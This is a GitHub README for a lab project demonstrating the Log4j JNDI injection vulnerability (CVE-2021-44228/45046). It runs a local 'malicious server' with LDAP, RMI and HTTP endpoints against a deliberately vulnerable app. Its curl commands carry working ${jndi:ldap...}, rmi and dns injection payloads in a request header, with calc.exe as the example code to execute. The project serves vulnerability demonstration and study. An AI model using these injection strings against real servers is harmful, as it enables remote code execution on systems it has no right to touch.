Skip to content

Log4j CVE-2021-44228 examples: Remote Code Execution (through LDAP, RMI, ...), Forced DNS queries, ...

Notifications You must be signed in to change notification settings

manuel-alvarez-alvarez/log4j-cve-2021-44228

Repository files navigation

Log4j CVE-2021-44228 and CVE-2021-45046

Requisites

Use a vulnerable JDK, for instance JDK 1.8.0_181

Usage

Malicious server

The malicious server deploys the following endpoints:

  • 1389 LDAP server
  • 1099 RMI server
  • 8081 HTTP server
./gradlew :malicious-server:bootRun

Vulnerable application

The vulnerable application deploys one HTTP endpoint at 8082

./gradlew :vulnerable-app:bootRun

Remote Code Execution

Choose a payload that will be executed by the vulnerable app and encode it in Base64. As an example, in order to open the calculator in Windows: calc.exe

LDAP

curl --header "X-Vulnerable-Header: ${jndi:ldap://localhost:1389/payload/Log4j/Y2FsYy5leGU=}" http://127.0.0.1:8082/

RMI

curl --header "X-Vulnerable-Header: ${jndi:rmi://localhost:1099/payload/Log4j/Y2FsYy5leGU=}" http://127.0.0.1:8082/

DNS queries

curl --header "X-Vulnerable-Header: ${jndi:dns://8.8.8.8/google.es}" http://127.0.0.1:8082/

About

Log4j CVE-2021-44228 examples: Remote Code Execution (through LDAP, RMI, ...), Forced DNS queries, ...

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages